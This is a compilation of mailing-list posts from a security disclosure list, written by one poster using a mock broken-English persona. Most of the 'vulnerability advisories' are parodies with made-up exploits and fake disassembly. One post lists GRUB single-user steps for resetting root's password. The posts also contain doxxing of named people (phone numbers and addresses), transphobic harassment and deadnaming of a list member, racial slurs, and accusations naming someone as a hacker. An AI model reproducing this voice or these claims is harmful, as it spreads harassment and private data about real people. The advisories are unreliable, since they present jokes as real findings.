Hello full disclosure!! !! !!

Is like to warn you about APT. APT is mean Association for is
Prevention of is Torture. http://www.apt.ch

Is musntlive receive email from APT is say to stop using their name
for mean malware from China.

Is musntlive's best interest to believe is this APT overflow is come
from Richard Bejtlich of Taosecurity and Mandiant.

Please Richard, is stop say APT so much. If is you must say give space
between China and is APT. Everything is not China!! Thank you. Is say
hi to Amy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Is Flame Malware Disclosure

2012-06-13 Thread Григорий Братислава
Hello Full Disclosure!! !! !!

Is like warn you about Flame but is you not get hints then is you not
understand. Is maybe you reverse is you see. Is thank me in the future

; обман, Спасибо Касперский

??2@YAPAXI@Z proc near
var_C= dword ptr -0Ch
arg_0= dword ptr  8
pushebp
mov ebp, esp
sub esp, 0Ch
jmp short loc_10036907


Proof: Flame Is begin at 2:35
http://www.youtube.com/watch?v=wR2F9Km5d0w (Seven!)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Metadata exfiltration

2012-06-12 Thread Григорий Братислава
`Sudhanshu Chauhan is a researcher at InfoSec Institute. He is in his
final year of studies as a B.Tech (CSE). He has completed his Diploma
in Cyber Security and has earned certifications in Web Development and
Cyber Laws. `

Is this is joke? `completed his Diploma in Cyber Security` is from who
he graduate with such diploma? `has earned certifications in Web
Development and Cyber Laws.` Earned certification in Cyber Laws` is
from who? Ask.com? Web development is from who? Is must be joke.

Is long ago, I respect infosecinstitute is now you must merge complete
with brainbench to make become new certification of 'Is Secuker to
spend your money' ISSYM certification. Is you make competition for ISC

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerability in Zombie Processes

2012-06-12 Thread Григорий Братислава
Hello is Full Disclosure!! !! !!

Is like to warn you about is Zombie apocalypse. Is only on OpenBSD is
exist zombie process. Is can be seen like how:

ps -xua | awk '$8 == "Z"'

Is musntlive develop process 25 years ago is stop

/*
*
* зомби.c
* musntLive is musnt give away is LUA
* Flamer Kaspersky creation secrets
*
*/

void getMessage(lua_State* L, int idx, void* ptr)
{
  *(const char**)ptr = lua_tostring(L, idx);
}
...
lua_CFunction fct;
const char* msg;
lua_genpcall(L, "return print, 'z0mb!3S'",
  ">%c %k", &fct, getMessage, &msg);
lua_pushstring(L, msg);
fct(L);

Is more information on Zombies

A Pennsylvania woman driving a car with the license plate ZOMBIE is
accused of hitting two pedestrians with her car and then zapping
another man with a stun gun:
http://content.usatoday.com/communities/ondeadline/post/2012/06/zombie-attack-leads-to-arrest-in-pennsylvania/1#.T9dYyrXh-So)

Special ammunition optimised for fighting zombies is selling like hot
cakes in the USA, according to reports, following sensational media
coverage of incidents involving flesh-eating and similar undead-esque
behaviour. http://www.theregister.co.uk/2012/06/11/zombie_bullets/

'Miami zombie' attack autopsy: Ronald Poppo's flesh not found in Rudy
Eugene's stomach
http://www.wptv.com/dpp/news/news_archives/miami-zombie-attack-autopsy-ronald-poppos-flesh-not-found-in-rudy-eugenes-stomach#ixzz1xamf8d9l

Cranberries http://www.youtube.com/watch?v=6Ejga4kJUts

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 3:57 PM, Laurelai  wrote:
> And you would be wrong.

I find right term for you Wesley. Destructive Narcissist
http://en.wikipedia.org/wiki/Narcissistic_leadership#Impact_of_healthy_v._destructive_narcissistic_managers

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 3:18 PM, Laurelai  wrote:

> I don't see how Iran developing nuclear power is a threat, I'm sorry to
> me this just seems like more fear mongering.

And is this how you fail. There is no problem is in developing nuclear
POWER there is problem when you is weaponize it. You need is go back
to school.

-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 3:02 PM, Laurelai  wrote:

> You mean where i publicly called out the people selling zero days to the
> US gov?

No I is meant where you allow is your narcissism is permeate in conversation.

-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 2:52 PM, Laurelai  wrote:
> *adds names to a list of people likely selling zero days*

Is not surprise me. Is you need know, national security trumps FBI CIS
http://www.fbi.gov/news/testimony/improving-our-confidential-human-source-program
every times. You could not is even touch me with ten foot drag queen
pole. Is thanks for clarifying your role.

-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 2:41 PM, Christian Sciberras  wrote:
> Perhaps the US Government would gain better results by mass protests and
> chanting peace songs.
>
> Or perhaps it just doesn't work this way.
>

Good plan! Bring is hot cocoa and marshmallows. Then we is sing:
http://www.youtube.com/watch?v=RkZC7sqImaM

-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 2:20 PM, Laurelai  wrote

> There you have it folks, the best argument the so called experts could
> come up with as to why we shouldn't do anything about this is name
> calling and half baked attempts at derailing the conversation and more
> spelling errors than a 5th graders book report.
>
> I must have hit a nerve or something, makes me wonder if im speaking to
> the very people selling the zero day exploits. You wouldn't be having a
> guilty conscience or anything would you all? Worried we might put a stop
> to your gravy train perhaps?
>
> Now back on topic, those of us who actually have a soul should work
> together to find a good solution.
>
> Anyone interested feel free to email me.

Derail? I ask valid question.

Hit nerve? Not in is my book. All exploit is I make I hoard is like
American TV show Hoarders Buried Alive. I has so many zero day exploit
I is now count in negative. So now I has -108 days and is money for to
buy is you ask? American, Chinese, Russian, and is Euro countries. All
is government and is company spy on company. Is beautiful life. Is
like arms race, never die.

Is your comment on soul is opinion. Speak religion (soul) where is I
believe, no soul. Dirt. Cavemen we is rise, dirt we is go. Evilution
little Wesley. I ask valid question. You change name, sex, etc., when
you is serve Army, you was one person. Person no longer here. Here as
in is someone with social security, someone is identifiable. No.
Person speak is Laurelai, not Wesley therefore is question I make
valid. You (Laurelai) has never served in Army is otherwise you would
is has camaraderie. Is respect for others is serve now, has served in
past, have died. You is slap everyone in face for go against the
country you is once swore to defend. Hypocrisy is plus narcissism.


-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 1:58 PM, Laurelai  wrote:

> And that brings us back to what are we going to do about the US Gov laying
> down in the same mud as the bad guys

I is detect narcissism Wesley. "what are we" is you ask. Define we. Is
you has gang behind you? (I is not mean for those actions is we call
in your pronounce huesos). You are is nobody special don't is kidding
yourself. You are is home living with mama and papa confused manshe
who is cannot hold down job because of yours is action is let alone
start any revolution.


-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 1:47 PM, Laurelai  wrote:

> Congress shall make no law respecting an establishment of religion, or
> prohibiting the free exercise thereof; or abridging the freedom of speech,
> or of the press; or the right of the people peaceably to assemble, and to
> petition the Government for a redress of grievances.
>
> I know English isnt your first language so if you need help with the words
> let me know. I don't see any part there that says trans people still don't
> have that right.

I am is glad you know lots about my first language maybe too perhaps
also you perhaps wrong?  Is you see no mention of trans people perhaps
maybe is because men is have balls back is when constitution written.
Maybe perhaps yes is you go back to any religious book you can maybe
perhaps is point us out where it say "Adam and heshe" or "Mahmoud and
heshe" or "Menachnem and heshe"


-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 1:36 PM, Laurelai  wrote:

> Excuse me but im a veteran who served 10 years in the Army and I damn well
> earned my right to complain about how broken the system is, myself and the
> soldiers around me sacrificed so that we could all have a free country and
> that yes I could "whine" about it. Its called the US Constitution, we took
> an oath to uphold and defend it and everything it stands for. I didnt sign
> up to "get laid or paid" I did it to serve a cause greater than myself, not
> that you would know anything about that. Oh and that "Free clinic paid for
> by the government" is called the VA Hospital and I already earned the care
> I can receive there. Want to complain about it now? Feel free. You have
> that right. Its called freedom of speech. You are welcome.
>
>
Is this time you serve when you was boy? (Wesley Bailey) Or is after you is
transform. Is valid question. Yes is Wesley have right to complain, Wesley
in Army, not Laurelai. Laurelai has no right


-- 

`Wherever I is go - there am I routed`
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
On Fri, Jun 8, 2012 at 1:36 PM, Laurelai  wrote:

> Excuse me but im a veteran who served 10 years in the Army and I damn well
> earned my right to complain about how broken the system is, myself and the
> soldiers around me sacrificed so that we could all have a free country and
> that yes I could "whine" about it. Its called the US Constitution, we took
> an oath to uphold and defend it and everything it stands for. I didnt sign
> up to "get laid or paid" I did it to serve a cause greater than myself, not
> that you would know anything about that. Oh and that "Free clinic paid for
> by the government" is called the VA Hospital and I already earned the care
> I can receive there. Want to complain about it now? Feel free. You have
> that right. Its called freedom of speech. You are welcome.
>
>
Is this time you serve when you was boy? (Wesley Bailey) Or is after you is
transform. Is valid question. Yes is Wesley have right to complain, Wesley
in Army, not Laurelai. Laurelai has no right


-- 

`Wherever I is go - there am I routed`
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-08 Thread Григорий Братислава
"In California you can always find a party, in Soviet Russia, the Party can
always is find you!"

-- 

`Wherever I is go - there am I routed`
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vulnerabilities in OpenBSD and billions is other websites

2012-06-06 Thread Григорий Братислава
Hello full disclosure!! !! (is I forget another !!)

I want to warn you about is vulnerability in OpenBSD and is maybe
perhaps possible is Linux and BeOS.

-
Is affected maybe possible perhaps
-

OpenBSD
NetBSD
FreeBSD
DragonflyBSD
FruitcakeBSD
Ubuntu
Kbuntu
Anotherbuntu
BeOS
NeXTOS

-
Details:
-

Is when someone is play knetwalk is user can get full scope!! Root!!


-
Is proof:
-

[grigori@bratislava] knetwalk > /dev/nullaruski 2>&1 && knetwalk >
/dev/nullaruski 2>&1 && knetwalk > /dev/nullaruski 2>&1 &&

And is you do this is 255 times we has:

[grigori@bratislava] knetwalk > /dev/nullaruski 2>&1 && knetwalk >
/dev/nullaruski 2>&1 && knetwalk > /dev/nullaruski 2>&1 &&
kbuildsycoca running...
DCOP Cleaning up dead connections.
segmentation is fault
[root@bratislva]# ICE default IO error handler doing an exit(), pid =
1984, errno = 42


-
Timeline:
-
1984.01.14 Madonna is sing Holiday on American Bandstand
1984.01.24 Apple is release personal computer (musntlive is has
exploit at this time)
1984.02.19 Is we make nuclear test at Kazakh Semipalitinsk
1984.02.19 musntlive plan advisory
2012.06.06 musntlive disclose real 0day is not fake


-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details

2012-06-05 Thread Григорий Братислава
Is you think only vulnerability is not use https? Is not https Man In
the Middleable?

And is some of you is guys make title of "Security is Something" (SiS)
is you forget extra sy on is end.

On Tue, Jun 5, 2012 at 10:16 AM, doc mombasa  wrote:
> the only "vulnerability" here is not using https?
> .
>
> 2012/6/4 Григорий Братислава 
>>
>> Paranoia. Thor I is always publicly share contacts:
>>
>> Adrian Lamo
>> c/o DMH Vacavill Psychiatric Hospital
>> Vacavill, CA
>> (707) 449-6504
>>
>> Hector Monsegur
>> (480) 948-6377
>> ADDRESS IS WITHOLD
>>
>> John Paul (JP)
>> 594 3rd St
>> Beaver PA
>> www.inspirosity.com (is Out of business moved into is Gay porn)
>>
>> Jesse Tuttle
>> (http://enquirer.com/editions/2003/07/28/hacker_zoom.jpg)
>> (480) 948-6377
>> ADDRESS IS WITHOLD
>>
>> Gary McKinnon
>> PSC 1005
>> Box 25 FPO AE / Cellblock 42
>> Guantanamo Bay 09593
>>
>> AS (is in case I am too arrested)
>> 4340 East West Hwt Suite 350
>> Bethesda MD
>>
>> Has nothing to hid.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>



-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TrueCaller Vulnerability Allows Changing Users Details

2012-06-04 Thread Григорий Братислава
Paranoia. Thor I is always publicly share contacts:

Adrian Lamo
c/o DMH Vacavill Psychiatric Hospital
Vacavill, CA
(707) 449-6504

Hector Monsegur
(480) 948-6377
ADDRESS IS WITHOLD

John Paul (JP)
594 3rd St
Beaver PA
www.inspirosity.com (is Out of business moved into is Gay porn)

Jesse Tuttle
(http://enquirer.com/editions/2003/07/28/hacker_zoom.jpg)
(480) 948-6377
ADDRESS IS WITHOLD

Gary McKinnon
PSC 1005
Box 25 FPO AE / Cellblock 42
Guantanamo Bay 09593

AS (is in case I am too arrested)
4340 East West Hwt Suite 350
Bethesda MD

Has nothing to hid.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Vulnerability in is Dopewars

2012-05-17 Thread Григорий Братислава
Hello Full-Disclosure!! !! !!

Is like to warn you about is vulnerability in Dopewars. I'm is
discover vulnerability perhaps 10 years ago but is posting now.

Is problem exist when carry more than is 50 cocaines and is Officer
Hardass (pitifully armed) is kill 2 of is your bitches. Is when this
happen player is obviously targeted!

Is exploit will happen only when player is in is Brooklyn (not Queens)
and is has identity given to Officer Hardass!

Proof exist in code:

8056370:   85 c0   test   %eax,%eax
8056372:   7f dc   jg 8056350

8056374:   eb b9   jmp805632f

8056376:   8d 76 00lea0x0(%esi),%esi
8056379:   8d bc 27 00 00 00 00lea0x0(%edi),%edi
8056380:   55  push   %ebp
8056381:   89 e5   mov%esp,%ebp
8056383:   53  push   %ebx
8056384:   83 ec 14sub$0x14,%esp
8056387:   8b 5d 0cmov0xc(%ebp),%ebx
805638a:   c7 44 24 04 00 00 00movl   $0x46256595(%eip) //
<-- Is hardcoded proof

perl -e 'printf "Barrett your is bed is ready @ " . "0x" .
"%02x"x4."\n",70,37,101,149'

Is MusntLive not contact Dopewars developer this year but next when is
I release new advisory!

(NO IS HAMSTER IS HURT DURING IS MAKING OF IS POST AND IS NO
LUMBERJACKS IS HARMED ISEVER SEKTIEWHOARE IS EXPOSED)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerability in Backtrack

2012-04-24 Thread Григорий Братислава
Is good evening. I is would like to warn you about is vulnerability in
Backtrack is all version.

Backtrack Linux is penetration tester is system. Is come complete with
tool for to make hacking for penetration tester.

In is booting Backtrack, vulnerability exist in booting for when start
if attacker is edit grub, attacker can bypass restricted user and is
boot into admin account. E.g.:

grub edit > kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single
[ENTER]
grub edit > b
# mount -t proc proc /proc
# mount -o remount,rw /
# passwd
[ENTER IS ANYTHING YOU WANT]
# sync
# reboot

I is will make this into video for bypassing security in Backtrack for
to post on InfoSecInstitute

-- 

`Wherever I is go - there am I routed`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Full disclosure is arrest of Sabu

2011-07-25 Thread Григорий Братислава
Is all take of notice is lack of communication is spell ending of
Lulzsuck securty. Now go away pizda anonymous script kiddies. Is your
tflow = gone, is your ryan = gone, is your laurelai = gone, now is
your Sabu = MIA.

http://twitter.com/#!/anonymouSabu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Advisory to is expose Sabu others is Pizdas

2011-07-25 Thread Григорий Братислава
Hello Full Disclosure!!!

Is want to warn you about is group is called Anonymous is Lulzsec and
is hackers yes. Is be Lulzsec leader Sabu is now for to be named and
is was Hector who say "disinformation be my game" but is MustnLive now
is prove how is Sabu is really is Hugo Carvalho is once and for all.

Security people and is FBI when is you work on is Internet for so many
is years, is common sense is to see news. This is you cannot avoid
yes, seeing news when working 24x7x365. Not only is true but is also
is when someone is say see your name is associated with is script
kiddie pizda shit fuckers Lulzsec, is you will take is steps to
"clear" is your name.

Is now we come to psychology 101. For if you work all time on
Internet, someone will is have to call you to say: "Hector Carvalho,
you pizda, your is name is under attack" this is will be your
coworker, your girlfriend and for you is Transformer hackers
[Rutkowska] - your boyfriend - someone is will harass you. You is will
know and is you will say: "for why has thou forsaken me to be called
hacker Sabu" is you will go immediate to Portugese SIS not is local
pizda cops and is say: "No I is not the pizda Sabu, I for has proof!"
This is similar to Hugo Carvalho, you is will publicly state you is
have nothing to do with Lulzsuck." Is you do so to cover your banana.
Is you forget one thing Hugo pizda, is not local Portuguese police is
you need to inform puto, is SIS. Is that is be your downfall

Pizda attackers like Sabu is high on arrogance. Is must think because
is FBI or SIS is not knock down door yet, is Hugo all safe and is
cozy. Is what Hugo not know is that is authorities is process to make
subpoena for this is take long time. Is not same day process, this is
not same day photo service. Authorities is must take is steps to weed
out no good information, is surveillance you Hugo. Is this be your is
downfall.

Poor Hugo :( Is all know who you are and is matter of only time. Since
is your friends Ryan and TFlow is arrest is maybe you is stupid to is
not read news: "A 16-year-old Londoner going by the online nickname
"T-Flow" or "Tflow" spent between 12 and 24 hours in custody" - - -
"The four individuals aged 17 to 35 were released "because they
cooperated with the investigation," according to Friday's DutchNews.nl
report. The four reportedly "made statements about their hacking
activities and involvement with hackers""
[http://www.pcmag.com/article2/0,2817,2388949,00.asp]

So is while you [Hugo] is talk a lot of hackercrap
[http://twitter.com/#!/anonymouSabu/status/95248544621015040] is every
bit of arrogantcy information is will bring you down. Is you can use
proxies all is you want dummy, is however, sqlite will lead to truths
as is will Paypal and is GoDaddy is transactions. Is you forget that
in is America, is this the law to keep data and is records. Is easy to
go to backup records yes and is further expose you. Is you also can
retrieve information on is BSD too Hugo even with is TrueCrypt puto,
is what forensics snipers must be to for.

In is with this is I say to you Hugo - Camp X Ray is waiting Hugo,
otherwise is you can drink antifreeze on Youtube for us to laugh at
your is stupidity. Tempo está passando idiota, apenas uma questão de
dias antes que você andou na frente dos meios de comunicação como um
criminal. Is you feel me my nigg3r? Now is run and tell your little
brother papi chulo is will be assraped in United States. Is also your
excessive use of Portuguese idiota. Puerto Ricans no speak it.


http://internationalextraditionblog.files.wordpress.com/2011/03/portugal-protocol-eu.pdf

ARTICLE I.

It is agreed that the Government of the United States of America and
the Government of His Most Faithful Majesty the King of Portugal and
of the Algarves shall, upon mutual requisition duly made as herein
provided, deliver up to justice any person who may be charged with or
may have been convicted of any of the crimes specified in Article II
of this Convention committed within the jurisdiction of one of the
Contracting Parties while said person was actually within such
jurisdiction when the crime was committed, and who shall seek an
asylum or shall be found within the territories of the other, provided
that such surrender shall take place only upon such evidence of
criminality, as according to the laws of the place where the fugitive
or person so charged shall be found, would justify his apprehension
and commitment for trial if the crime or offence had been there
committed.

ARTICLE II.

Persons shall be delivered up according to the provisions of this
Convention, who shall have been charged with or convicted of any of
the following crimes:

18. Obtaining money, valuable securities or other property by false
pretenses or receiving any money, valuable securities or other
property knowing the same to have been unlawfully obtained, where the
amount of money or the value of the property so obtained or received
exceeds two hundred dollars or the equivale

[Full-disclosure] Warning is about vulnerability

2011-06-03 Thread Григорий Братислава
Hello is list!!

I is like to warn you is about vulnerability. Is vulnerability is what
get Sony, RSA, L3, Google and is Hilary Clinton hacked. Please is
watch vulnerabilities and is never forgot when is you use !! many
times, is many more take your advisories is serious!!

http://www.thinkgeek.com/tshirts-apparel/unisex/popculture/78c6/

-- 

`I am epic win`

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Covert Backdoor in is All BSD {free, net, open, dragon, pc, (un)trusted}

2011-05-02 Thread Григорий Братислава


                  MusntLive Security Advisory

                           2nd May, 2011

Covert Backdoor(s) in is all BSDs via is way of OpenBSD



SYNOPSIS

OpenBSD is is rumored to is has covert backdoor via is obfuscated legacy
code. Is try to be deflected by other covert government agent is not say
name for sake of predator drone strike. Howisever, is must summarize to
everyone from post:

http://home.comcast.net/~ajawamnet/VA7751.jpg [OpenBSD is backdoor board)
http://lists.randombit.net/pipermail/cryptography/2010-December/000443.html

Is MusntLive comment in comment /* style code */

After reviewing the code. Here are my opinions:

* Angelos Keromytis made huge contributions to OpenBSD by porting and
enhancing the early IPsec implementation of John Ioannidis. He also
contributed to the initial development of the OpenBSD crypto framework.

* In what is perhaps the sincerest form of flattery, this code has also
been incorporated into many other projects, some of which are closed
source and some are not derived from BSD.

/* This is mean that everyone is now have similar backdoor */

* I didn't spot anything malicious or intentionally backdoored in the
IPsec ESP implementation code that I looked at.

/* This is mean that is pockets is must be greased */

* There was a serious vulnerability in ESP-mode IPsec shipped in OpenBSD
3.0 and 3.1 and silently patched before 3.2.

* Gregory Perry made allegations that were specific and testable enough
that they merited a little investigation and a bug was found that could
have made a very close match for his description. But upon closer
inspection, this particular bug is extremely ordinary.

/* This is mean that is normal backdoor, no overlap */

* I primarily reviewed a small set of source files specific to ESP,
these only partially overlapped those of the developer Perry accused by
name (Jason Wright). Nevertheless, any credence which might have been
given to Perry's claims as a result of this bug should be reverted to
zero (or less).

/* Is only small set review then is analysis worthless */

* This bug doesn't sufficiently meet the criteria for a malicious backdoor:

- The bug does not leak key material or establish a covert channel, it
would require an active attack to exploit and even then would probably
need to be used in connection with some other defect in order to result
in meaningful unauthorized access. Yeah sorta it maybe could be used as
part of that, but not really its own.

/* Is because no one would use salami attack. Is you has to ask about
salami you is no hacker */

- The bug is not hidden. There is nothing to suggest any attempt at
misdirection or obfuscation.

/* Is because hiding is in plain sight is never used */

- The bug is not particularly subtle or even hard-to-find.

- Angelos is a recognized expert in low-level maliciousness. Surely he
would have come up with something better.

/* Of course is however, we is not speak of Angelos, we is speak
of Jason Wright */

- The bug has a far simpler explanation (more on that later)

/* Fat finger is reason */

* There is little or nothing to suggest that Angelos was influenced by
money from NETSEC. To the contrary, judging by publications, Angelos
clearly had a plethora of research projects on his plate at the time he
moved on from OpenBSD in July of 2002 (shortly before the bug was patched).

/* Is because money is never is motivator for anyone */

* When Angelos moved on, the IPsec and associated crypto code were
adopted by Jason and other OpenBSD developers. But the transition
appears to have left some code changes in an unfinished state. For
example, the inverted conditional at the core of this problem looks like
it was introduced as part of an architectural enhancement to support
IPsec-enabled network cards which performed decryption and
authentication of the incoming packets right on the NIC itself. However,
no drivers of this type appeared in the source tree, so the new logic
probably went untested. The apparent work-in-progress code silently
became part of the 3.0 and subsequent release branches.

/* Is hurt my eye is to read this paragraph */

* OpenBSD did not live up to their stated principle of full disclosure.
They should have issued an advisory for this.
http://openbsd.org/security.html

/* OpenBSD is not live up to come clean */

* OpenBSD's security auditing processes did not catch this bug, either
when it was introduced or in any subsequent review. In a follow-up email
to the CVS commit, Jason indicates that the fix was supplied by BSD guru
Sam Leffler, who was working on an optimized IPsec implementation for
FreeBSD about that time.

/* Is first sentence speak for itself: "OpenBSD's security auditing
processes did not catch this bug" is because Theo is not care */

* Code coverage testing would have had a good chance of cat

Re: [Full-disclosure] Vulnerabilities in MaxSite Anti Spam Image for WordPress

2011-04-01 Thread Григорий Братислава
  Is hello full disclosure!!

  Is you see ! is call explanation mark is mean that I is mean
business!! I is like to warn you about blacklisting. Blacklisting is
really racialist!! In is early America, we is make fun of is people
like Snoop Dogg. Is was talk down to them: "nigger go is clean up that
shit" and is American paint face to mimic this and is call is this
Blackface. (http://en.wikipedia.org/wiki/Blackface) Is blacklist
originally is start from list of blackies in is written down. Meaning,
whities is say: "is you see that nigger Nobama right there. Blacklist
is his ass and make is him clean the toilets. Then is go paint your
face and is act like him. Just is make sure is that is blacklisted."

  Is no polite to blacklist. Apologies to Thor, Valdis and others is
for Must Live. Must Live: Не мудак повинні жити

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] is warning about SCADA security

2011-03-24 Thread Григорий Братислава
  hello full disclosure is like to warn you about SCADA software.

  is SCADA software must run on computers and is must power machines
you is rely on for daily life.  is example of SCADA is electric
system.  in is SCADA we has connection : SCADA machine : gear : power
is make sense for SCADA HMI send data to SCADA machine and is SCADA
machine is tell gear 'you is gear and is you must perform'.  Gear is
perform and all is has power for Pravda.ru

  is reason for SCADA is many for to run life we need is SCADA.

  in is this week we has guinea whiny researcher who is blackmail
company 'i find bug you is pay me' and is researcher told 'go to hell
skripk1dd1e' by ZDI and is other white collar vulnerability syndicate
crime organization we is confuse and call vulnerability brokers.
skriptk1dd1e [luigi] is publish vulnerability and is put life in
dangerous place.

  is not reason for this post.  is reason for this post is theo is
otherwise known as g...@cvs.openbsd.org  is theo is dangerous whiner.
for to is you not think like theo is you will not go forward.  is go
forward as in living a single live is no one want to marry you.

  is example

  theo to boyfriend (is no proof is theo ever is has girl):  Dragos is
you think OpenSSH is best in world?
  dragos to theo:  is think random seed is not random is till PRNG is use
  theo to dragos:  no!  is you speak foolish.  is you not use your
brain like me.  is why you not theo, and is why you not know what you
talk about.  i hate you and is i hate the world
  dragos to theo:  [smooch] i is love you theo
  theo to dragos:  is no one understand me.  is people not has my
brain is no worth living
  theo to dragos:  [walking out the door of is Sugar Daddy's on Davie
Street in Vancouver] dragos i is leave you gun shoot yourself.  i is
not can live in misery of is world not on my level

  is now i present new security award to is luigi and theo.  is call:
"honorable is security researcher"  is feel free to is print the award
is you two has earn it http://bit.ly/9Uk2v5

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in some SCADA server softwares

2011-03-24 Thread Григорий Братислава
> Without public visibility, they will keep running the old code.

   In is this old code you is speak of, does is code contain backdoor
in crypto code? Or is backdoor now off is topic of discussion?

  We is lucky to have your is graycious presents on this list is Theo.
Is we all learn to be prick like you we can all is teach world is that
we no care for life is we care for security reporting. Down with is
vendor and their is backdoors!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerability is in response

2011-02-17 Thread Григорий Братислава
Hello full-disclosure!!

I is like to warn you about rhetoric and annoyance nuisance. Is once
upon a time MustLive has maybe is one exploit to is make me say "черт
возьми!" howisever MustLive is how you say? pička in Crotia.

Is I top post for annoy:

1) MustLive is lonely pička with is one to many copy of cracked
Accunetix is run in background to report to full disclosure (hi is
look at me, I find vuln no one is care about!!)

2) Is vuln he find are old news to many who choose is not to release
lame advisory (is especially those future advisory of his)

3) Is every so often I is want to kick him in teeth and say "is shut
up puto sucio"

Your guess is wrong. MustLive is point and click-kiddiot (&TM;) who is
never discovery real vulnerability and is not even know what is EAX
(is hint not to be confused with is LAX airport)

4) Is stop feeding troll

On Thu, Feb 17, 2011 at 1:29 PM, Zach C.  wrote:
> Well, just playing devil's advocate here, mind you, I think much of the
> irritation from MustLive's postings comes from the following three reasons:
